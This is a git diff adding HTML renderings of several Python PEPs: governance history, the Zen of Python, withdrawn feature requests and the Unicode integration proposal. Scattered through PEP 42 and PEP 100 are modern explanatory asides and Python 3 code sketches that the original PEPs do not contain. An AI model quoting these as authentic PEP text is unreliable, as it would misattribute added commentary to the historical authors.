+
+

History of council elections

+ +
+
+

History of amendments

+
    +
  • 2019-04-17: Added the vote length for core devs and changes to this document.
  • +
  • 2024-12-10: +Adopted Multi-winner Bloc STAR voting for council elections.
  • +
  • 2024-12-10: +Added a one-week deadline for seconding a vote of no confidence.
  • +
+
+
+
+

Acknowledgements

+

This PEP began as PEP 8016, which was written by Nathaniel J. Smith +and Donald Stufft, based on a Django governance document written by +Aymeric Augustin, and incorporated feedback and assistance from +numerous others.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0013.rst

+

Last modified: 2024-12-13 07:56:19 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0020/index.html b/pep-0020/index.html new file mode 100644 index 00000000000..4630d9e6e61 --- /dev/null +++ b/pep-0020/index.html @@ -0,0 +1,176 @@ PEP 20 – The Zen of Python | peps.python.org
+
+

+
+
+

PEP 20 – The Zen of Python

+
+
Author:
+
Tim Peters <tim.peters at gmail.com>
+
Status:
+
Active
+
Type:
+
Informational
+
Created:
+
19-Aug-2004
+
Post-History:
+
22-Aug-2004
+
+
+
+
+
+

Abstract

+

Long time Pythoneer Tim Peters succinctly channels the BDFL’s guiding +principles for Python’s design into 20 aphorisms, only 19 of which +have been written down.

+
+
+

The Zen of Python

+
Beautiful is better than ugly.
+Explicit is better than implicit.
+Simple is better than complex.
+Complex is better than complicated.
+Flat is better than nested.
+Sparse is better than dense.
+Readability counts.
+Special cases aren't special enough to break the rules.
+Although practicality beats purity.
+Errors should never pass silently.
+Unless explicitly silenced.
+In the face of ambiguity, refuse the temptation to guess.
+There should be one-- and preferably only one --obvious way to do it.
+Although that way may not be obvious at first unless you're Dutch.
+Now is better than never.
+Although never is often better than *right* now.
+If the implementation is hard to explain, it's a bad idea.
+If the implementation is easy to explain, it may be a good idea.
+Namespaces are one honking great idea -- let's do more of those!
+
+
+
+
+

Easter Egg

+
>>> import this
+
+
+
+
+

References

+

Originally posted to comp.lang.python/python-list@python.org under a +thread called “The Way of Python”

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0020.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0042/index.html b/pep-0042/index.html new file mode 100644 index 00000000000..79381530ab7 --- /dev/null +++ b/pep-0042/index.html @@ -0,0 +1,377 @@ PEP 42 – Feature Requests | peps.python.org
+
+

+
+
+

PEP 42 – Feature Requests

+
+
Author:
+
Jeremy Hylton <jeremy at alum.mit.edu>
+
Status:
+
Withdrawn
+
Type:
+
Process
+
Created:
+
12-Sep-2000
+
Post-History:
+

+
+
+
+
+
+

Important

+

This PEP has been withdrawn.

+


+

It is obsolete. +All new feature requests should either go to the Python bug tracker +for very simple requests or the Ideas Discourse category for +everything else. The rest of this document is retained for historical +purposes only.

+

+
+
+

Introduction

+

This PEP contains a list of feature requests that may be considered +for future versions of Python. Large feature requests should not be +included here, but should be described in separate PEPs; however a +large feature request that doesn’t have its own PEP can be listed here +until its own PEP is created. See PEP 0 for details.

+

This PEP was created to allow us to close bug reports that are really +feature requests. Marked as Open, they distract from the list of real +bugs (which should ideally be less than a page). Marked as Closed, +they tend to be forgotten. The procedure now is: if a bug report is +really a feature request, add the feature request to this PEP; mark +the bug as “feature request”, “later”, and “closed”; and add a comment +to the bug saying that this is the case (mentioning the PEP +explicitly). It is also acceptable to move large feature requests +directly from the bugs database to a separate PEP.

+

This PEP should really be separated into four different categories +(categories due to Laura Creighton):

+
    +
  1. BDFL rejects as a bad idea. Don’t come back with it.
  2. BDFL will put in if somebody writes the code. (Or at any rate, +BDFL will say ‘change this and I will put it in’ if you show up +with code.)

     possibly divided into:

     2a. BDFL would really like to see some code!
     2b. BDFL is never going to be enthusiastic about this, but +will work it in when it’s easy.

  3. If you show up with code, BDFL will make a pronouncement. It might +be ICK.
  4. This is too vague. This is rejected, but only on the grounds of +vagueness. If you like this enhancement, make a new PEP.
+
+
+

Core Language / Builtins

+
    +
  • The parser should handle more deeply nested parse trees.

    The following will fail – eval("["*50 + "]"*50) – because +the parser has a hard-coded limit on stack size. This limit should +be raised or removed. Removal would be hard because the current +compiler can overflow the C stack if the nesting is too deep.

    +

    https://bugs.python.org/issue215555

    +
  • +
  • Non-accidental IEEE-754 support (Infs, NaNs, settable traps, etc). +Big project.
  • +
  • Windows: Trying to create (or even access) files with certain +magic names can hang or crash Windows systems. This is really a +bug in the OSes, but some apps try to shield users from it. When +it happens, the symptoms are very confusing.

    Hang using files named prn.txt, etc https://bugs.python.org/issue481171

    +
  • +
  • eval and free variables: It might be useful if there was a way to +pass bindings for free variables to eval when a code object with +free variables is passed. https://bugs.python.org/issue443866
  • +
+
+
+

Standard Library

+
    +
  • The urllib module should support proxies which require +authentication. See SourceForge bug #210619 for information:

    https://bugs.python.org/issue210619

    +
  • +
  • os.rename() should be modified to handle EXDEV errors on platforms +that don’t allow rename() to operate across filesystem boundaries +by copying the file over and removing the original. Linux is one +system that requires this treatment.

    https://bugs.python.org/issue212317

    +
  • +
  • signal handling doesn’t always work as expected. E.g. if +sys.stdin.readline() is interrupted by a (returning) signal +handler, it returns “”. It would be better to make it raise an +exception (corresponding to EINTR) or to restart. But these +changes would have to be applied to all places that can do blocking +interruptible I/O. So it’s a big project.

    https://bugs.python.org/issue210599

    +
  • +
  • Extend Windows utime to accept directory paths.

    https://bugs.python.org/issue214245

    +
  • +
  • Extend copy.py to module & function types.

    https://bugs.python.org/issue214553

    +
  • +
  • Better checking for bad input to marshal.load*().

    https://bugs.python.org/issue214754

    +
  • +
  • rfc822.py should be more lenient than the spec in the types of +address fields it parses. Specifically, an invalid address of the +form “From: Amazon.com <delivers-news2@amazon.com>” should be +parsed correctly.

    https://bugs.python.org/issue210678

    +
  • +
  • cgi.py’s FieldStorage class should be more conservative with memory +in the face of large binary file uploads.

    https://bugs.python.org/issue210674

    +

    There are two issues here: first, because +read_lines_to_outerboundary() uses readline() it is possible that a +large amount of data will be read into memory for a binary file +upload. This should probably look at the Content-Type header of the +section and do a chunked read if it’s a binary type.

    +

    The second issue was related to the self.lines attribute, which was +removed in revision 1.56 of cgi.py (see also):

    +

    https://bugs.python.org/issue219806

    +
  • +
  • urllib should support proxy definitions that contain just the host +and port

    https://bugs.python.org/issue210849

    +
  • +
  • urlparse should be updated to comply with RFC 2396, which defines +optional parameters for each segment of the path.

    https://bugs.python.org/issue210834

    +
  • +
  • The exceptions raised by pickle and cPickle are currently +different; these should be unified (probably the exceptions should +be defined in a helper module that’s imported by both). [No bug +report; I just thought of this.]
  • +
  • More standard library routines should support Unicode. For +example, urllib.quote() could convert Unicode strings to UTF-8 and +then do the usual %HH conversion. But this is not the only one!

    https://bugs.python.org/issue216716

    +
  • +
  • There should be a way to say that you don’t mind if str() or +__str__() return a Unicode string object. Or a different function +– ustr() has been proposed. Or something…

    http://sf.net/patch/?func=detailpatch&patch_id=101527&group_id=5470

    +
  • +
  • Killing a thread from another thread. Or maybe sending a signal. +Or maybe raising an asynchronous exception.

    https://bugs.python.org/issue221115

    +
  • +
  • The debugger (pdb) should understand packages.

    https://bugs.python.org/issue210631

    +
  • +
  • Jim Fulton suggested the following (a sketch of how this idea later landed in the standard library appears after this list):
    I wonder if it would be a good idea to have a new kind of
    +temporary file that stored data in memory unless:
    +
    +- The data exceeds some size, or
    +
    +- Somebody asks for a fileno.
    +
    +Then the cgi module (and other apps) could use this thing in a
    +uniform way.
    +
    +
    +

    https://bugs.python.org/issue415692

    +
  • +
  • Jim Fulton pointed out that binascii’s b2a_base64() function has +situations where it makes sense not to append a newline, or to +append something else than a newline.

    Proposal:

    +
      +
    • add an optional argument giving the delimiter string to be +appended, defaulting to “\n”
    • +
    • possibly special-case None as the delimiter string to avoid adding +the pad bytes too???
    • +
    +

    https://bugs.python.org/issue415694

    +
  • +
  • pydoc should be integrated with the HTML docs, or at least be able +to link to them.

    https://bugs.python.org/issue405554

    +
  • +
  • Distutils should deduce dependencies for .c and .h files.

    https://bugs.python.org/issue472881

    +
  • +
  • asynchat is buggy in the face of multithreading.

    https://bugs.python.org/issue595217

    +
  • +
  • It would be nice if the higher level modules (httplib, smtplib, +nntplib, etc.) had options for setting socket timeouts.

    https://bugs.python.org/issue723287

    +
  • +
  • The curses library is missing two important calls: newterm() and +delscreen()

    https://bugs.python.org/issue665572, http://bugs.debian.org/175590

    +
  • +
  • It would be nice if the built-in SSL socket type could be used for +non-blocking SSL I/O. Currently packages such as Twisted which +implement async servers using SSL have to require third-party +packages such as pyopenssl.
  • +
  • reST as a standard library module
  • +
  • The import lock could use some redesign.

    https://bugs.python.org/issue683658

    +
  • +
  • A nicer API to open text files, replacing the ugly (in some +people’s eyes) “U” mode flag. There’s a proposal out there to have +a new built-in type textfile(filename, mode, encoding). (Shouldn’t +it have a bufsize argument too?)
  • +
  • Support new widgets and/or parameters for Tkinter
  • +
  • For a class defined inside another class, the __name__ should be +“outer.inner”, and pickling should work. (GvR is no longer certain +this is easy or even right.)

    https://bugs.python.org/issue633930

    +
  • +
  • Decide on a clearer deprecation policy (especially for modules) and +act on it.

    https://mail.python.org/pipermail/python-dev/2002-April/023165.html

    +
  • +
  • Provide alternatives for common uses of the types module; Skip +Montanaro has posted a proto-PEP for this idea:

    https://mail.python.org/pipermail/python-dev/2002-May/024346.html

    +
  • +
  • Use pending deprecation for the types and string modules. This +requires providing alternatives for the parts that aren’t covered +yet (e.g. string.whitespace and types.TracebackType). It seems we +can’t get consensus on this.
  • +
  • Lazily tracking tuples?

    https://mail.python.org/pipermail/python-dev/2002-May/023926.html +https://bugs.python.org/issue558745

    +
  • +
  • Make ‘as’ a keyword. It has been a pseudo-keyword long enough. +(It’s deprecated in 2.5, and will become a keyword in 2.6.)
  • +
+
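The in-memory-unless-large temporary file Jim Fulton asked for above eventually landed in the standard library as tempfile.SpooledTemporaryFile (Python 2.6+): it buffers data in memory until a size threshold is exceeded or a caller asks for a fileno(), then rolls over to a real file. A brief illustration (the _rolled attribute is a private implementation detail, inspected here only to show the rollover):

import tempfile

# Spool up to 1 KiB in memory; roll over to a real on-disk file
# only if the data grows past that, or if fileno() is requested.
with tempfile.SpooledTemporaryFile(max_size=1024) as f:
    f.write(b"small payload")
    print(f._rolled)        # False: still purely in memory
    f.write(b"x" * 2048)
    print(f._rolled)        # True: exceeded max_size, now on disk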
+
+

C API wishes

+
    +
  • Add C API functions to help Windows users who are building embedded +applications where the FILE * structure does not match the FILE * +the interpreter was compiled with.

    https://bugs.python.org/issue210821

    +

    See this bug report for a specific suggestion that will allow a +Borland C++ builder application to interact with a python.dll build +with MSVC.

    +
  • +
+
+
+

Tools

+ +
+
+

Building and Installing

+
    +
  • Modules/makesetup should make sure the ‘config.c’ file it generates +from the various Setup files, is valid C. It currently accepts +module names with characters that are not allowable in Python or C +identifiers.

    https://bugs.python.org/issue216326

    +
  • +
  • Building from source should not attempt to overwrite the +Include/graminit.h and Parser/graminit.c files, at least for people +downloading a source release rather than working from Subversion or +snapshots. Some people find this a problem in unusual build +environments.

    https://bugs.python.org/issue219221

    +
  • +
  • The configure script has probably grown a bit crufty with age and +may not track autoconf’s more recent features very well. It should +be looked at and possibly cleaned up.

    https://mail.python.org/pipermail/python-dev/2004-January/041790.html

    +
  • +
  • Make Python compliant to the FHS (the Filesystem Hierarchy +Standard)

    http://bugs.python.org/issue588756

    +
  • +
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0042.rst

+

Last modified: 2024-04-14 20:08:31 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0100/index.html b/pep-0100/index.html new file mode 100644 index 00000000000..68ab6bc72ad --- /dev/null +++ b/pep-0100/index.html @@ -0,0 +1,1314 @@ PEP 100 – Python Unicode Integration | peps.python.org
+
+

+
+
+

PEP 100 – Python Unicode Integration

+
+
Author:
+
Marc-André Lemburg <mal at lemburg.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
10-Mar-2000
+
Python-Version:
+
2.0
+
Post-History:
+

+
+
+
+
+
+

Historical Note

+

This document was first written by Marc-Andre in the pre-PEP days, +and was originally distributed as Misc/unicode.txt in Python +distributions up to and including Python 2.1. The last revision of +the proposal in that location was labeled version 1.7 (CVS +revision 3.10). Because the document clearly serves the purpose +of an informational PEP in the post-PEP era, it has been moved +here and reformatted to comply with PEP guidelines. Future +revisions will be made to this document, while Misc/unicode.txt +will contain a pointer to this PEP.

+

-Barry Warsaw, PEP editor

+
+
+

Introduction

+

The idea of this proposal is to add native Unicode 3.0 support to +Python in a way that makes use of Unicode strings as simple as +possible without introducing too many pitfalls along the way.

+

Since this goal is not easy to achieve – strings being one of the +most fundamental objects in Python – we expect this proposal to +undergo some significant refinements.

+

Note that the current version of this proposal is still a bit +unsorted due to the many different aspects of the Unicode-Python +integration.

+

The latest version of this document is always available at: +http://starship.python.net/~lemburg/unicode-proposal.txt

+

Older versions are available as: +http://starship.python.net/~lemburg/unicode-proposal-X.X.txt

+

[ed. note: new revisions should be made to this PEP document, +while the historical record previous to version 1.7 should be +retrieved from MAL’s url, or Misc/unicode.txt]

+
+
+

Conventions

+
    +
  • In examples we use u = Unicode object and s = Python string
  • +
  • ‘XXX’ markings indicate points of discussion (PODs)
  • +
+
+
+

General Remarks

+
    +
  • Unicode encoding names should be lower case on output and +case-insensitive on input (they will be converted to lower case +by all APIs taking an encoding name as input).
  • +
  • Encoding names should follow the name conventions as used by the +Unicode Consortium: spaces are converted to hyphens, e.g. ‘utf +16’ is written as ‘utf-16’.
  • +
  • Codec modules should use the same names, but with hyphens +converted to underscores, e.g. utf_8, utf_16, iso_8859_1.
  • +
+
+
+

Unicode Default Encoding

+

The Unicode implementation has to make some assumption about the +encoding of 8-bit strings passed to it for coercion and about the +encoding to use as default for conversion of Unicode to strings when +no specific encoding is given. This encoding is called <default +encoding> throughout this text.

+

For this, the implementation maintains a global which can be set +in the site.py Python startup script. Subsequent changes are not +possible. The <default encoding> can be set and queried using the +two sys module APIs:

+
+
sys.setdefaultencoding(encoding)
Sets the <default encoding> used by the Unicode implementation. +encoding has to be an encoding which is supported by the +Python installation, otherwise, a LookupError is raised.

Note: This API is only available in site.py! It is +removed from the sys module by site.py after usage.

+
+
sys.getdefaultencoding()
Returns the current <default encoding>.
+
+

If not otherwise defined or set, the <default encoding> defaults +to ‘ascii’. This encoding is also the startup default of Python +(and in effect before site.py is executed).
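As an illustrative aside (assuming a modern Python 3 interpreter, not the Python 2.0 described here): only the getter survived, and the default has long since become UTF-8.

import sys

# Python 2.0 started up with 'ascii' as described above; today's
# interpreters report 'utf-8' and sys.setdefaultencoding() is gone.
print(sys.getdefaultencoding())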

+

Note that the default site.py startup module contains disabled +optional code which can set the <default encoding> according to +the encoding defined by the current locale. The locale module is +used to extract the encoding from the locale default settings +defined by the OS environment (see locale.py). If the encoding +cannot be determined, is unknown or unsupported, the code defaults +to setting the <default encoding> to ‘ascii’. To enable this +code, edit the site.py file or place the appropriate code into the +sitecustomize.py module of your Python installation.

+
+
+

Unicode Constructors

+

Python should provide a built-in constructor for Unicode strings +which is available through __builtins__:

+
u = unicode(encoded_string[,encoding=<default encoding>][,errors="strict"])
+
+u = u'<unicode-escape encoded Python string>'
+
+u = ur'<raw-unicode-escape encoded Python string>'
+
+
+

With the ‘unicode-escape’ encoding being defined as:

+
    +
all non-escape characters represent themselves as Unicode +ordinals (e.g. ‘a’ -> U+0061).
  • +
  • all existing defined Python escape sequences are interpreted as +Unicode ordinals; note that \xXXXX can represent all Unicode +ordinals, and \OOO (octal) can represent Unicode ordinals up to +U+01FF.
  • +
  • a new escape sequence, \uXXXX, represents U+XXXX; it is a syntax +error to have fewer than 4 digits after \u.
  • +
+

For an explanation of possible values for errors see the Codec +section below.

+

Examples:

+
u'abc'          -> U+0061 U+0062 U+0063
+u'\u1234'       -> U+1234
+u'abc\u1234\n'  -> U+0061 U+0062 U+0063 U+1234 U+000a
+
+
+

The ‘raw-unicode-escape’ encoding is defined as follows:

+
    +
\uXXXX sequences represent the U+XXXX Unicode character if and +only if the number of leading backslashes is odd
  • +
all other characters represent themselves as Unicode ordinals +(e.g. ‘b’ -> U+0062)
  • +
+

Note that you should provide some hint to the encoding you used to +write your programs as a pragma line in one of the first few comment +lines of the source file (e.g. ‘# source file encoding: latin-1’). +If you only use 7-bit ASCII then everything is fine and no such +notice is needed, but if you include Latin-1 characters not +defined in ASCII, it may well be worthwhile including a hint since +people in other countries will want to be able to read your source +strings too.

+
+
+

Unicode Type Object

+

Unicode objects should have the type UnicodeType with type name +‘unicode’, made available through the standard types module.

+
+
+

Unicode Output

+

Unicode objects have a method .encode([encoding=<default encoding>]) +which returns a Python string encoding the Unicode string using the +given scheme (see Codecs).

+
print u := print u.encode()   # using the <default encoding>
+
+str(u)  := u.encode()         # using the <default encoding>
+
+repr(u) := "u%s" % repr(u.encode('unicode-escape'))
+
+
+

Also see Internal Argument Parsing and Buffer Interface for +details on how other APIs written in C will treat Unicode objects.

+
+
+

Unicode Ordinals

+

Since Unicode 3.0 has a 32-bit ordinal character set, the +implementation should provide 32-bit aware ordinal conversion +APIs:

+
ord(u[:1]) (this is the standard ord() extended to work with Unicode
+            objects)
+  --> Unicode ordinal number (32-bit)
+
+unichr(i)
+    --> Unicode object for character i (provided it is 32-bit);
+        ValueError otherwise
+
+
+

Both APIs should go into __builtins__ just like their string +counterparts ord() and chr().
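For comparison, a minimal sketch of how this looks in today's Python 3, where unichr() has folded back into chr() and the full range beyond 16 bits is supported:

assert ord("\u1234") == 0x1234
assert chr(0x1F40D) == "\U0001F40D"   # outside the 16-bit BMP
try:
    chr(0x110000)                     # past the top of the Unicode range
except ValueError as exc:
    print(exc)                        # chr() arg not in range(0x110000)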

+

Note that Unicode provides space for private encodings. Usage of +these can cause different output representations on different +machines. This problem is not a Python or Unicode problem, but a +machine setup and maintenance one.

+
+
+

Comparison & Hash Value

+

Unicode objects should compare equal to other objects after these +other objects have been coerced to Unicode. For strings this +means that they are interpreted as a Unicode string using the +<default encoding>.

+

Unicode objects should return the same hash value as their ASCII +equivalent strings. Unicode strings holding non-ASCII values are +not guaranteed to return the same hash values as the default +encoded equivalent string representation.

+

When compared using cmp() (or PyObject_Compare()) the +implementation should mask TypeErrors raised during the conversion +to remain in synch with the string behavior. All other errors +such as ValueErrors raised during coercion of strings to Unicode +should not be masked and passed through to the user.

+

In containment tests (‘a’ in u’abc’ and u’a’ in ‘abc’) both sides +should be coerced to Unicode before applying the test. Errors +occurring during coercion (e.g. None in u’abc’) should not be +masked.

+
+
+

Coercion

+

Using Python strings and Unicode objects to form new objects +should always coerce to the more precise format, i.e. Unicode +objects.

+
u + s := u + unicode(s)
+
+s + u := unicode(s) + u
+
+
+

All string methods should delegate the call to an equivalent +Unicode object method call by converting all involved strings to +Unicode and then applying the arguments to the Unicode method of +the same name, e.g.

+
string.join((s,u),sep) := (s + sep) + u
+
+sep.join((s,u)) := (s + sep) + u
+
+
+

For a discussion of %-formatting w/r to Unicode objects, see +Formatting Markers.

+
+
+

Exceptions

+

UnicodeError is defined in the exceptions module as a subclass of +ValueError. It is available at the C level via +PyExc_UnicodeError. All exceptions related to Unicode +encoding/decoding should be subclasses of UnicodeError.
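This hierarchy is easy to observe in a current interpreter; a quick sketch (Python 3 spelling):

try:
    b"\xff".decode("ascii")
except UnicodeError as exc:
    # UnicodeDecodeError subclasses UnicodeError, which in turn
    # subclasses ValueError, exactly as specified above.
    print(type(exc).__name__)          # UnicodeDecodeError
    assert isinstance(exc, ValueError)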

+
+
+

Codecs (Coder/Decoders) Lookup

+

A Codec (see Codec Interface Definition) search registry should be +implemented by a module “codecs”:

+
codecs.register(search_function)
+
+
+

Search functions are expected to take one argument, the encoding +name in all lower case letters and with hyphens and spaces +converted to underscores, and return a tuple of functions +(encoder, decoder, stream_reader, stream_writer) taking the +following arguments:

+
+
encoder and decoder
These must be functions or methods which have the same +interface as the .encode/.decode methods of Codec instances +(see Codec Interface). The functions/methods are expected to +work in a stateless mode.
+
stream_reader and stream_writer
These need to be factory functions with the following +interface:
factory(stream,errors='strict')
+
+
+

The factory functions must return objects providing the +interfaces defined by StreamWriter/StreamReader resp. (see +Codec Interface). Stream codecs can maintain state.

+

Possible values for errors are defined in the Codec section +below.

+
+
+

In case a search function cannot find a given encoding, it should +return None.

+

Aliasing support for encodings is left to the search functions to +implement.

+

The codecs module will maintain an encoding cache for performance +reasons. Encodings are first looked up in the cache. If not +found, the list of registered search functions is scanned. If no +codecs tuple is found, a LookupError is raised. Otherwise, the +codecs tuple is stored in the cache and returned to the caller.

+

To query the Codec instance the following API should be used:

+
codecs.lookup(encoding)
+
+
+

This will either return the found codecs tuple or raise a +LookupError.
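To make the lookup protocol concrete, here is a minimal sketch against today's codecs module, which wraps the tuple described above in a codecs.CodecInfo object; the encoding name "myascii" is a hypothetical alias invented for this example:

import codecs

def search(name):
    # The registry passes the normalized (lower-case) encoding name;
    # unknown encodings must yield None so other search functions run.
    if name == "myascii":
        return codecs.lookup("ascii")  # reuse the built-in codec's entry
    return None

codecs.register(search)
print("abc".encode("myascii"))         # b'abc'
print(codecs.lookup("myascii").name)   # 'ascii'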

+
+
+

Standard Codecs

+

Standard codecs should live inside an encodings/ package directory +in the Standard Python Code Library. The __init__.py file of that +directory should include a Codec Lookup compatible search function +implementing a lazy module based codec lookup.

+

Python should provide a few standard codecs for the most relevant +encodings, e.g.

+
'utf-8':              8-bit variable length encoding
+'utf-16':             16-bit variable length encoding (little/big endian)
+'utf-16-le':          utf-16 but explicitly little endian
+'utf-16-be':          utf-16 but explicitly big endian
+'ascii':              7-bit ASCII codepage
+'iso-8859-1':         ISO 8859-1 (Latin 1) codepage
+'unicode-escape':     See Unicode Constructors for a definition
+'raw-unicode-escape': See Unicode Constructors for a definition
+'native':             Dump of the Internal Format used by Python
+
+
+

Common aliases should also be provided per default, e.g. +‘latin-1’ for ‘iso-8859-1’.

+

Note: ‘utf-16’ should be implemented by using and requiring byte +order marks (BOM) for file input/output.
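The BOM handling is easy to observe; a small sketch in Python 3 spelling (where all string literals are Unicode):

data = "abc".encode("utf-16")      # BOM prepended in native byte order
print(data)                        # e.g. b'\xff\xfea\x00b\x00c\x00'
print(data.decode("utf-16"))       # BOM consumed again: 'abc'
print("abc".encode("utf-16-le"))   # explicit endianness: no BOM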

+

All other encodings such as the CJK ones to support Asian scripts +should be implemented in separate packages which do not get +included in the core Python distribution and are not a part of +this proposal.

+
+
+

Codecs Interface Definition

+

The following base classes should be defined in the module “codecs”. +They provide not only templates for use by encoding module +implementors, but also define the interface which is expected by +the Unicode implementation.

+

Note that the Codec Interface defined here is well suited to a +larger range of applications. The Unicode implementation expects +Unicode objects on input for .encode() and .write() and character +buffer compatible objects on input for .decode(). Output of +.encode() and .read() should be a Python string and .decode() must +return a Unicode object.

+

First, we have the stateless encoders/decoders. These do not work +in chunks as the stream codecs (see below) do, because all +components are expected to be available in memory.

+
class Codec:
+
+    """Defines the interface for stateless encoders/decoders.
+
+       The .encode()/.decode() methods may implement different
+       error handling schemes by providing the errors argument.
+       These string values are defined:
+
+         'strict'  - raise an error (or a subclass)
+         'ignore'  - ignore the character and continue with the next
+         'replace' - replace with a suitable replacement character;
+                     Python will use the official U+FFFD
+                     REPLACEMENT CHARACTER for the builtin Unicode
+                     codecs.
+    """
+
+    def encode(self,input,errors='strict'):
+
+        """Encodes the object input and returns a tuple (output
+           object, length consumed).
+
+           errors defines the error handling to apply.  It
+           defaults to 'strict' handling.
+
+           The method may not store state in the Codec instance.
+           Use StreamCodec for codecs which have to keep state in
+           order to make encoding/decoding efficient.
+        """
+
+    def decode(self,input,errors='strict'):
+
+        """Decodes the object input and returns a tuple (output
+           object, length consumed).
+
+           input must be an object which provides the
+           bf_getreadbuf buffer slot.  Python strings, buffer
+           objects and memory mapped files are examples of objects
+           providing this slot.
+
+           errors defines the error handling to apply.  It
+           defaults to 'strict' handling.
+
+           The method may not store state in the Codec instance.
+           Use StreamCodec for codecs which have to keep state in
+           order to make encoding/decoding efficient.
+
+        """
+
+
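Before moving on to the stream interfaces, the three errors values defined in the docstring above can be exercised directly through the modern descendants of these methods; a minimal sketch:

raw = b"a\xffb"
print(raw.decode("ascii", errors="replace"))   # 'a\ufffdb' (U+FFFD)
print(raw.decode("ascii", errors="ignore"))    # 'ab'
try:
    raw.decode("ascii", errors="strict")
except UnicodeDecodeError as exc:
    print(exc)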
+

StreamWriter and StreamReader define the interface for stateful +encoders/decoders which work on streams. These allow processing +of the data in chunks to efficiently use memory. If you have +large strings in memory, you may want to wrap them with cStringIO +objects and then use these codecs on them to be able to do chunk +processing as well, e.g. to provide progress information to the +user.

+
class StreamWriter(Codec):
+
+    def __init__(self,stream,errors='strict'):
+
+        """Creates a StreamWriter instance.
+
+           stream must be a file-like object open for writing
+           (binary) data.
+
+           The StreamWriter may implement different error handling
+           schemes by providing the errors keyword argument.
+           These parameters are defined:
+
+             'strict' - raise a ValueError (or a subclass)
+             'ignore' - ignore the character and continue with the next
+             'replace'- replace with a suitable replacement character
+        """
+        self.stream = stream
+        self.errors = errors
+
+    def write(self,object):
+
+        """Writes the object's contents encoded to self.stream.
+        """
+        data, consumed = self.encode(object,self.errors)
+        self.stream.write(data)
+
+    def writelines(self, list):
+
+        """Writes the concatenated list of strings to the stream
+           using .write().
+        """
+        self.write(''.join(list))
+
+    def reset(self):
+
+        """Flushes and resets the codec buffers used for keeping state.
+
+           Calling this method should ensure that the data on the
+           output is put into a clean state, that allows appending
+           of new fresh data without having to rescan the whole
+           stream to recover state.
+        """
+        pass
+
+    def __getattr__(self,name, getattr=getattr):
+
+        """Inherit all other methods from the underlying stream.
+        """
+        return getattr(self.stream,name)
+
+
+class StreamReader(Codec):
+
+    def __init__(self,stream,errors='strict'):
+
+        """Creates a StreamReader instance.
+
+           stream must be a file-like object open for reading
+           (binary) data.
+
+           The StreamReader may implement different error handling
+           schemes by providing the errors keyword argument.
+           These parameters are defined:
+
+             'strict' - raise a ValueError (or a subclass)
+             'ignore' - ignore the character and continue with the next
+             'replace'- replace with a suitable replacement character;
+        """
+        self.stream = stream
+        self.errors = errors
+
+    def read(self,size=-1):
+
+        """Decodes data from the stream self.stream and returns the
+           resulting object.
+
+           size indicates the approximate maximum number of bytes
+           to read from the stream for decoding purposes.  The
+           decoder can modify this setting as appropriate.  The
+           default value -1 indicates to read and decode as much
+           as possible.  size is intended to prevent having to
+           decode huge files in one step.
+
+           The method should use a greedy read strategy meaning
+           that it should read as much data as is allowed within
+           the definition of the encoding and the given size, e.g.
+           if optional encoding endings or state markers are
+           available on the stream, these should be read too.
+        """
+        # Unsliced reading:
+        if size < 0:
+            return self.decode(self.stream.read())[0]
+
+        # Sliced reading:
+        read = self.stream.read
+        decode = self.decode
+        data = read(size)
+        i = 0
+        while 1:
+            try:
+                object, decodedbytes = decode(data)
+            except ValueError,why:
+                # This method is slow but should work under pretty
+                # much all conditions; at most 10 tries are made
+                i = i + 1
+                newdata = read(1)
+                if not newdata or i > 10:
+                    raise
+                data = data + newdata
+            else:
+                return object
+
+    def readline(self, size=None):
+
+        """Read one line from the input stream and return the
+           decoded data.
+
+           Note: Unlike the .readlines() method, this method
+           inherits the line breaking knowledge from the
+           underlying stream's .readline() method -- there is
+           currently no support for line breaking using the codec
+           decoder due to lack of line buffering.  Subclasses
+           should however, if possible, try to implement this
+           method using their own knowledge of line breaking.
+
+           size, if given, is passed as size argument to the
+           stream's .readline() method.
+        """
+        if size is None:
+            line = self.stream.readline()
+        else:
+            line = self.stream.readline(size)
+        return self.decode(line)[0]
+
+    def readlines(self, sizehint=None):
+
+        """Read all lines available on the input stream
+           and return them as list of lines.
+
+           Line breaks are implemented using the codec's decoder
+           method and are included in the list entries.
+
+           sizehint, if given, is passed as size argument to the
+           stream's .read() method.
+        """
+        if sizehint is None:
+            data = self.stream.read()
+        else:
+            data = self.stream.read(sizehint)
+        return self.decode(data)[0].splitlines(1)
+
+    def reset(self):
+
+        """Resets the codec buffers used for keeping state.
+
+           Note that no stream repositioning should take place.
+           This method is primarily intended to be able to recover
+           from decoding errors.
+
+        """
+        pass
+
+    def __getattr__(self,name, getattr=getattr):
+
+        """ Inherit all other methods from the underlying stream.
+        """
+        return getattr(self.stream,name)
+
+
+

Stream codec implementors are free to combine the StreamWriter and +StreamReader interfaces into one class. Even combining all these +with the Codec class should be possible.
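A brief usage sketch, assuming today's codecs module where codecs.getreader() and codecs.getwriter() return the StreamReader/StreamWriter factories described above:

import codecs, io

raw = io.BytesIO()
writer = codecs.getwriter("utf-8")(raw)
writer.write("h\xe9llo\n")              # encoded on the way out

raw.seek(0)
reader = codecs.getreader("utf-8")(raw)
print(reader.readline())                # decoded back: 'héllo\n'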

+

Implementors are free to add additional methods to enhance the +codec functionality or provide extra state information needed for +them to work. The internal codec implementation will only use the +above interfaces, though.

+

It is not required by the Unicode implementation to use these base +classes, only the interfaces must match; this allows writing +Codecs as extension types.

+

As guideline, large mapping tables should be implemented using +static C data in separate (shared) extension modules. That way +multiple processes can share the same data.

+

A tool to auto-convert Unicode mapping files to mapping modules +should be provided to simplify support for additional mappings +(see References).

+
+
+

Whitespace

+

The .split() method will have to know about what is considered +whitespace in Unicode.
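Python 3 implements exactly this; a tiny sketch showing that .split() with no arguments honours Unicode whitespace such as U+00A0 NO-BREAK SPACE:

print("a\u00a0b".split())   # ['a', 'b']
print("\u00a0".isspace())   # True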

+
+
+

Case Conversion

+

Case conversion is rather complicated with Unicode data, since +there are many different conditions to respect. See

+
+
+

for some guidelines on implementing case conversion.

+

For Python, we should only implement the 1-1 conversions included +in Unicode. Locale dependent and other special case conversions +(see the Unicode standard file SpecialCasing.txt) should be left +to user land routines and not go into the core interpreter.

+

